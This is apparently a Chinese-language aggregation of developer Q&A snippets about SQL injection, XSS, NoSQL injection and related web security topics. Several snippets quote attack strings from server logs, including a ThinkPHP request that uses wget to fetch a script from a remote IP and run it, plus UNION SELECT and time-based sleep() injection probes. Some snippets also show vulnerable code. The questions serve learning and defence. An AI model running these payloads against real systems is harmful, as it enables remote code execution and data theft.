1回答
我读过关于ORM注入和SQL注入的文章。在许多网站上,从测试人员的角度来看,ORM注入与SQL注入几乎是一样的。所以基本上我想知道的是ORM和SQL注入之间的主要区别。
如果还解释一下ORM的简要概念,这将是有帮助的。
浏览 2提问于2014-09-12得票数 1
1回答
我想知道如何才能使您自己的站点在Sql注入类型的攻击下完全安全。我读到在htaccess文件中启用魔术引号gpc就足够了。这足够了吗?还有别的把戏吗?如何了解脚本是否对Sql注入开放?例如,此代码段与攻击sql注入?
$sql = $_REQUEST['id'];
$sql = mysql_real_escape_string($sql);
$Query = "DELETE FROM Y WHERE id = ".$sql;
例如,像facebook或google这样的大型网站如何防止这种类型的攻击?对不起,我的英语...
另外,我不能用面向对象
浏览 0提问于2013-06-08得票数 0
我知道statements攻击可以通过向应用程序注入SQL语句来获取未经授权获取或未经授权以未经授权的方式修改数据的信息来完成,如本链接https://www.w3schools.com/sql/sql_injection.asp中所提到的。
但是,假设有人在数据库服务器内安装恶意软件,该服务器修改或检索数据,这是否算作SQL注入攻击?
浏览 0提问于2023-01-12得票数 6
3回答
为什么这么多人对XSS使用不同的防御(攻击或漏洞)?我认为XSS是攻击,利用不足的过滤漏洞。我说的对吗?
这个问题的答案应该明确地解释什么是XSS的正确定义,并附加注释,为什么人们使用不同的定义。
浏览 0提问于2014-10-16得票数 4
回答已采纳
这是的后续问题。
它提到knex('table').where('description', 'like', '%${term}%')很容易受到sql注入攻击。甚至有评论都提到第一种情况是很容易被注入攻击的。然而,所提供的参考资料从未提到.where容易受到注入攻击。
这是个错误吗?为什么肯耐视允许.where容易受到注入攻击,而不允许.whereRaw('description like \'%??%\'', [term])攻击。在这两种情况下,参数不是都被参数化了吗?
浏览 6提问于2020-01-08得票数 5
回答已采纳
2回答
我正在使用WCFMVC3和EF4.1以及asp.net Azure。我正在为我的应用程序构建搜索引擎。并使用动态Linq来构建查询。在这种情况下,我想避免sql注入。同样的最佳实践是什么?在这种情况下,我应该做些什么准备工作?
浏览 1提问于2011-12-02得票数 2
回答已采纳
我的团队正在测试一些我们已经放弃SQL作为后端的产品。这意味着我们已经停止了围绕SQL注入的任何安全测试。我一直在怀疑,虽然SQL注入是不可能的,但是针对这些其他技术的其他类似的注入攻击是可能的,但我自己并没有太多的时间来研究这些技术。我们专门使用的两个非SQL解决方案是HBase(在Hadoop之上)和Cassandra。
是否有人对如何测试这些攻击有什么好的想法,或者有没有发现和测试这些潜在攻击的好的阅读、示例或方法?或者,任何能让我安心的阅读或解释,让我相信这些攻击是不可能的?我搜索了一下,没有找到任何关于这个问题的有用信息。
浏览 0提问于2012-12-14得票数 5
回答已采纳
1回答
我正在使用下面的代码片段从表中删除所有数据
NSString *deleteStatementNS = [NSString stringWithFormat:
@"DELETE FROM %@",[tableNames objectAtIndex:i]];
const char *prepareDelete ="DELETE FROM '?'";
const char *tbleName = [[tableNames objectAtIndex:i] UTF8String];
if
浏览 0提问于2012-06-06得票数 1
回答已采纳
2回答
Lucky13是对CBC MAC然后加密密匙中的MAC的定时攻击.在攻击页面中:
这些攻击包括检测TLS错误消息在网络上出现的时间上的微小差异,以响应攻击者生成的密文。
我的问题是:被动对手能执行Lucky13吗?换句话说,我需要知道Lucky13攻击者的模型是主动的MitM还是被动的网络攻击者,他们只是收集流量,然后进行分析?
浏览 0提问于2018-10-27得票数 2
回答已采纳
我是Android编程的新手,所以这可能是一个简单的问题,但我还没有找到答案。基本上,我调用的是一个需要C#的。我对发送未过滤的用户输入持怀疑态度。有相当多的地方我必须这样做,但登录是一个很好的例子:
这是我目前得到的一个粗略的版本(从其他SO示例拼凑而成):
String userName = "MyUserName";
String password= "MyPassword";
String url = "http://mywebserviceurl.com/auth;
String xml = "<AuthenticateModel
浏览 2提问于2012-03-27得票数 2
回答已采纳
2回答
我正在开发一个nodejs服务器,它将与客户端移动应用程序交互。我在服务器上遇到了一些称为XSS和XHR的攻击。我遇到了一个名为node-validator的模块,它对处理和验证输入很有用。我需要一个想法,如果XSS和XHR攻击有相同的效果,如果该模块对both.Any有用,关于这一点的想法将非常有帮助。
浏览 2提问于2013-03-08得票数 0
1回答
在命令注入中,您可以诱使服务为您做一些它通常不会做的事情。这是否意味着指令注射是(利用)混乱的代表的例子?反之亦然吗?
更普遍地说,命令注射和混淆代表是同一枚硬币的两个方面,还是它们之间的关系更加复杂?
浏览 0提问于2017-10-21得票数 4
我的web服务器周期性地受到攻击,我收到了一堆看起来像
/my.page?union+all+select+0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536--
是否有简单的命令行工具对此进行解码?
浏览 0提问于2013-08-27得票数 0
2回答
我目前正在使用mongoDB,我想知道我们应该采取什么措施来确保任何可能导致问题的数据都不会被存储。我相信像mysql_escape_string这样的普通PHP函数在这里不会有什么帮助。
有没有针对noSQL数据库,特别是mongoDB的SQL注入?
如果是这样的话,我们能做些什么来保护我们免受他们的攻击呢?
浏览 1提问于2010-09-07得票数 7
回答已采纳
1回答
当我想知道我应该构建多复杂的查询时,我只是阅读了。
到目前为止,我只是使用构建了一个字符串,因为在此应用程序中只使用了select、update、insert和delete。现在我也想知道正确的转义,当我问自己,为什么转义不只是转义那些符号'到这个\'。
在逃逸背后有没有更复杂的行为,或者这是不是已经完成了?
感谢您的投入!
浏览 1提问于2012-03-30得票数 1
回答已采纳
1回答
解析提交的JSON对象安全吗?
、、、、
我有一个RESTful API,它内置在NODE.js中,可以实现您期望的那样:使用数据,然后使其可访问。目前,提交给我的服务器的数据是嵌套表单数据:
data[0][username]=...
data[0][email]=...
data[0][phone]=...
...
data[12][username]=...
data[12][email]=...
data[12][phone]=...
或作为查询字符串
data[0][username]=...&data[0][email]=...&data[0][phone]=...
因此,当我在服务器上解析它时,我会得到带
浏览 0提问于2014-04-02得票数 1
我需要知道SQL注入是如何记录在日志文件中的。换句话说,我需要一个包含SQL注入的web日志文件条目的示例。另一个问题:是先记录日志文件,还是先在数据库中执行查询?谢谢
浏览 11提问于2012-03-10得票数 1
我正在Azure服务器上运行烧瓶,并使用POST从表单中发送数据,作为python脚本的参数。
下面是如何将参数传递给脚本并运行它
os.system("python3 script.py " + postArgument)
输出通常显示在日志中,就像显示在终端上一样。
如何将输出返回到新的网页?
浏览 4提问于2017-01-15得票数 0
回答已采纳
1回答
一个奇怪的问题..。
我的example.co_m服务器中有代码,它返回所有POST和GET请求的访问控制-允许-原产地响应头,其中包含example.com子域(_superman.example.com、batman.example.com等)的值。
现在我需要能够发出传递cookie的AJAX调用,所以如果请求包括cookie,我需要能够返回Access-Control-Allow-Credentials响应头。
如果我看到Cookie请求头,我可以添加一个额外的检查来返回访问控制-允许-凭据响应头,但是为了简单起见,我想知道 all 返回来自我的子域的所有GET/POST请求的访问控制
浏览 0提问于2015-09-15得票数 7
我想知道是否可以在一个或调用中通过Perl 使用执行多个SQL语句。示例:
# Multiple SQL statements in a single query, separated by a ";"
$sql = 'UPDATE foo SET bar = 123; DELETE FROM foo WHERE baz = 456';
$sth = $dbh->prepare($sql);
$sth->execute;
# ...or...
$dbh->do($sql);
我这么问并不是因为我真的想做这样的事情,而是因为我想通过成功的S
浏览 3提问于2009-06-03得票数 2
回答已采纳
1回答
我有一个已知的sqli漏洞,我想在web应用程序中试用sqlmap;但是,我不相信sqlmap能够解决这个问题。以下是该系统的工作方式:
在线程1中注入给定的参数s。
线程1将信息分发给第二个线程。线程1立即返回HTML消息,始终处于“挂起”状态。
线程2现在执行sqli并将文件写入我可以查找的网站中的一个位置。它还返回一条成功消息。
我不能直接调用Thread 2执行的私有方法,所以我需要从dispatcher开始。然而,我相信sqlmap只有在读取线程2的结果时才能发现这是一个成功的注入。有谁知道我如何才能让sqlmap理解这个序列?
浏览 0提问于2015-05-05得票数 0
回答已采纳
我正在为我最后一年的项目做CTF申请。我想要创建一个SQLi标志,但我不希望他们能够简单地通过注入来发现SQLi漏洞。因此,是否有办法使SQL注入更难,但不是不可能使用PHP?
浏览 0提问于2013-04-23得票数 6
回答已采纳
在我的应用程序中,我允许用户在单击delete按钮时从网格视图中删除整行。但我在delete查询中遇到错误。错误是“无效的列名”我的代码如下:
<asp:GridView ID="GridView1" runat="server" DataKeyNames="Username" AutoGenerateColumns="false" OnPageIndexChanging="GridView1_PageIndexChanging" OnRowDeleting="GridView1_RowDeleti
浏览 0提问于2013-08-23得票数 0
1回答
我让我的老板用在线服务在我们的服务器上做漏洞扫描,试图解释我们实际上并没有受到报告所说的漏洞的影响,这令人沮丧。
我是在自欺欺人,还是说这些服务“假设”是因为你允许在你的网站上发布它是脆弱的呢?我已经测试了大量的注入攻击,我们的服务器返回永远不允许它们执行,因为代码停止了它们。
让我的服务器对这些扫描免疫的最好方法是什么?我得到了一些东西,比如阻止apache/ PHP /openSSL报告它的版本,特别是因为我使用来自Debian安全团队的安全补丁版本,它不一定与PHP的补丁版本相匹配。
浏览 0提问于2010-09-01得票数 0
对不起,问这个愚蠢的问题,但如果我发现一个网站,是容易受到时间基SQL注入攻击。例如,我使用的是(睡眠20)意味着服务器将睡眠20秒,然后响应我,所以服务器只为我或网站上的所有用户关闭了20秒?
浏览 3提问于2022-08-16得票数 0
回答已采纳
我刚收到一份笔试报告,这些白痴在注入标题下包含了像SSRF和XXE这样的漏洞!这是胡说八道,他们有一些,但不是全部,注射攻击的特点。
在典型的注入攻击(如SQL注入)中,不可信数据通过字符串连接与可信查询相结合,然后将结果传递给一个解析它的函数--一个危险的接收器。
对于SSRF、XXE和其他一些问题,不受信任的数据直接传递到危险的接收器。没有字符串连接,所以很明显它们完全不同。
针对典型注入缺陷的补救建议通常涉及如何在查询中安全使用不受信任的数据,例如使用参数化查询。SSRF和XXE的补救建议通常围绕着配置,以确保危险的接收器安全,例如禁用外部实体或在孤立的网络段上使用代理。不同的补救方法证
浏览 0提问于2022-10-12得票数 -1
1回答
我已经设置了以下请求类来验证我的输入:
.
.
.
class SupplierStoreRequest extends FormRequest
{
.
.
.
public function rules()
{
return [
'name' => 'required|string|max:255',
'address' => 'required|string|max:255',
];
}
浏览 3提问于2019-10-09得票数 0
回答已采纳
1回答
我想写一个安全的简单的存储过程,它可以根据存储过程提供的一些参数从数据库表中选择一些列。 我尝试了两种编写存储过程的方法。 第一种方式为: CREATE PROCEDURE SPBasic
@id int,
@value int
AS
BEGIN
SELECT Id, name, design
FROM SimpleTable
WHERE ID = @id AND value = @value;
END
GO 第二种方式为: CREATE PROCEDURE SPBasic
@id int,
@value int
AS
BEGIN
浏览 26提问于2020-04-21得票数 1
1回答
可能重复:
目标:在输入DB之前,正确清理文本框中的所有输入,然后将其输出到页面。对于我的用例,我需要防止潜在的问题,同时不消除数据输入。此外,在HTTP头和元标记中,字符集显式地设置为UTF-8,以防止格式错误的编码问题。DB也被设置为UTF-8。
规范:PHP,MySQL,Apache
示例代码
function secureinput($input)
{
$input = htmlspecialchars($input, ENT_QUOTES ,'UTF-8');
$input = strip_tags($inpu
浏览 2提问于2012-07-28得票数 0
回答已采纳
2回答
通过查看错误日志,我发现了很多对web应用程序的请求,其中URL包含:
/if(now()=sysdate(),sleep(10),0)/*'XOR(if(now()=sysdate(),sleep(10),0))OR'"XOR(if(now()=sysdate(),sleep(10),0))OR"*/
我读到,这可能是对PHP开发的网站的攻击的一部分,我们不使用。此外,我们还使用ORM查询数据库。
那么,这是SQL注入尝试吗?
浏览 0提问于2015-08-03得票数 48
我在安全性方面的经验很少(仍在学习),但是我正在梳理我的日志,我注意到以下请求:
"GET /index.php?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=wget%20http://86.105.49.215/a.sh%20-O%20/tmp/a;%20chmod%200777%20/tmp/a;%20/tmp/a; HTTP/1.1" 200 16684 "-" "Mozilla/5.0
浏览 0提问于2019-02-28得票数 36
回答已采纳
1回答
随着对安全软件开发的持续研究,我发现了OWASP十大项目列表的技术影响,如:
https://www.owasp.org/index.php/Top_10_2010年-A1
同样地,美国国家石油公司的名单影响:中央情报局:http://capec.mitre.org/data/definitions/66.html
关于各种威胁的技术影响的进一步详情,是否有任何资源提供详细分析,包括可能的个案研究?
浏览 0提问于2012-03-05得票数 1
2回答
从基础研究来看,我的理解是:在SSL 3中的TLS 1.0中易受攻击
攻击者可以注入javascript并将一些已知文本传递给某个服务器,在该服务器中,攻击者将获得已知纯文本的加密版本,这就是如何知道加密机制的方法。
如果我误解了什么,请澄清。
问题:如何在页面上注入一些恶意java脚本?身份加密机制和应用相同的工具来解密cookie内容的工具是什么?
浏览 0提问于2013-09-08得票数 3
回答已采纳
我有这个特定的代码(这是一个mwe),我不明白为什么在浏览器或apache文件中没有打印MySQL错误:
$sql= "SELECT * from vulnDB where username = admin and password = '" . $_POST['password'] ."'";
if($result = mysqli_query($conn, $sql)) {
$row = mysqli_fetch_assoc($result);
if ($_POST['password'] ==
浏览 1提问于2019-02-07得票数 0
回答已采纳
我使用以下代码(使用sqlite3的python)将数据添加到表中: ''' INSERT INTO TABLE (USERNAME) VALUES ("''' + data + '''")''' If I block ",那么(据我所知)退出字符串应该是不可能的,随后就不可能进行SQL注入。 我的问题是:这会阻止用户注入SQL吗?如果没有,我应该添加更多的黑名单还是创建白名单? 非常感谢所有的帮助。
浏览 17提问于2019-01-25得票数 0
我正在读我那本值得信赖的O‘’Reilly书,偶然发现了一段关于Mongo如何自然地避免类似SQL注入的缺陷的文章。
在我的直觉里,我想我明白这一点。如果将未清理的JOIN传递到查询中,它们就不能使用UNION、var、查询转换为注释等打破面向文档的查询结构。
MongoDB如何避免SQL注入带来的混乱?这只是这个查询语法的本质吗?
浏览 1提问于2011-02-17得票数 71
回答已采纳
最近发现有人在搜索:
1和1 2联合选择0x6461726b31636f6465--
还有一堆变体。这是什么类型的利用,它试图做什么?我不认为我有任何特殊的风险,但是了解攻击者的目标是什么会很有帮助,所以我可以肯定,因为我以前从未见过这种情况。
此外,值得注意的是,在google上搜索"0x6461726b31636f6465“会产生大量的结果。为什么谷歌会爬行和索引一个搜索词,显然似乎是某种类型的漏洞利用?
浏览 0提问于2017-02-23得票数 2
回答已采纳
1回答
我正在测试一个网站,我发现在img中,当没有找到src时,onerror使用另一个图像。如果我检查并用警报更改onerror,它将完全正常工作。这是潜在的XSS漏洞吗?
浏览 0提问于2019-04-04得票数 0
表前缀对安全性有什么作用?
当我在本地主机上安装Joomla时,“出于安全原因”,它总是生成唯一的表前缀。为什么?
浏览 1提问于2013-03-16得票数 1
2回答
在本例中,是否可以使用SQL注入更新MySQL数据库中的字段或插入新行:
PHP代码中唯一的保护是mysql_real_escape_string()。
查询是用双引号构造的:"select id from db where id = $id"而不是单字串文字引号。
数据库是mysql (使用mysql_query php调用),所以我认为堆叠查询是不可能的(如果我错了,请纠正我)。
使用mysql而不是mysqli。
我试过使用像1; update users set first_name = foo这样没有运气的东西,并尝试以十六进制和八进制格式传递逗号、'和八进制
浏览 0提问于2014-11-11得票数 5
回答已采纳
当我们讨论在数据库中插入数据时,我已经学习了如何参数化我的文本框,现在我想实现同样的技术,同时手动为SQL数据库放置连接字符串。我的代码是这样的:
connectionString = "server=localhost;uid=" + usr.Text + ";pwd=" + pwd.Text;
而且我认为它很容易受到SQL注入的攻击。有什么建议吗?
浏览 1提问于2011-07-16得票数 0
我的前端javascript中有以下代码,它基本上读取csrf cookie值,并在通过jquery完成的ajax调用中设置它。
var csrftoken = self.getCookie('csrftoken');
xhr.setRequestHeader("X-CSRFToken", csrftoken);
这似乎是一种非常标准的技术,但Veracode将其报告为一个漏洞。
查看这种漏洞的详细信息,在https://cwe.mitre.org/data/definitions/113.html,我不认为这是一个问题,因为http头是从客户端
浏览 0提问于2020-01-06得票数 2
通常我在我的应用程序中使用整数ids,但对于这一段开发,我在一个文本字段上进行查找-一个标记名。
我确实使用了cfqueryparam,但考虑到它是一个文本字段,它是否容易受到sql注入攻击,如果是,除了乏味地在字符串中搜索SQL命令之外,其他人如何解决这个问题。
我的查询类似于:
SELECT tagId -- etc etc
FROM tag
WHERE tagName = <cfqueryparam cfsqltype="cf_sql_varchar" maxlength="50" value="#arguments.tagName#"
浏览 2提问于2011-08-12得票数 3
回答已采纳
1回答
我在中实现了谷歌本地广告
除了Android4.x版本之外,它在所有设备上都运行得很完美。控制台中的崩溃日志是
Non-fatal Exception: java.lang.IllegalArgumentException: Optimized data directory /storage/emulated/0/Android/data/com.myapp/cache is not owned by the current user. Shared storage cannot protect your application from code injection attacks.
浏览 1提问于2019-08-17得票数 10
回答已采纳
3回答
测试sql注入的SQLMAP
、、、、
我运行SQLMAP来测试其中一个站点的SQL注入,并获得以下信息。
sqlmap identified the following injection points with a total of 78 HTTP(s) requests:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=666' AND 1737=1737 AND 'pQMi'=
浏览 4提问于2013-09-06得票数 3
回答已采纳
我尝试使用Hack Bar在网站上执行SQL注入。服务器没有响应SQL错误。
我还尝试使用sqlmap:
sqlmap -u http://website/login.php?op=login --dbs
sqlmap -u http://website/login.php?id=1 --dbs
[10:06:33] [CRITICAL] all tested parameters appear to be not injectable.
所以我的问题是:即使web服务器没有显示任何错误,也可以得到SQL注入吗?
浏览 0提问于2016-11-02得票数 2
回答已采纳
我们最近将我们的DNN站点从6.0.3升级到7.4.2版本。
升级成功。但是最近,当我们登录到站点并单击Admin菜单选项时,我们得到了以下异常。
错误:基本功能当前不可用。DotNetNuke.Services.Exceptions.ModuleLoadException:字符串不能识别为有效的布尔值。-> System.FormatException:字符串不能被识别为有效的布尔值。在DesktopModules.Admin.Console.ViewConsole.OnLoad(EventArgs e处的System.Boolean.Parse(字符串值)--内部异常堆栈跟踪的末尾
浏览 1提问于2016-05-11得票数 0
回答已采纳
扫码
添加站长 进交流群
领取专属 10元无门槛券
手把手带您无忧上云
相关资讯
热门标签
云服务器
ICP备案
对象存储
实时音视频
即时通信 IM活动推荐
腾讯云开发者
